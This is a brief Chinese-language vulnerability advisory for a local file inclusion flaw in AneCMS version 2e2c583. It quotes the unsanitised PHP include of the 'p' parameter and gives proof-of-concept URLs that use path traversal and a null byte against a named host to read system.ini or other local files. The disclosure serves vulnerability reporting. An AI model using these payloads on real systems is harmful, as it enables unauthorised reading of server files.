标题: AneCMS v.2e2c583 LFI exploit
作者Author: I2sec-PJH
软件开发网站: https://github.com/AneGroup/AneCMS
影响版本: v.2e2c583
概述
source of index.php页面存在缺陷
代码分析如下
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
测试证明
http://www.badguest.cn /acp/index.php?p=../../../../windows/system.ini%00
http://www.badguest.cn /acp/index.php?p=../../../../[localfile]%00
提供修复:
过滤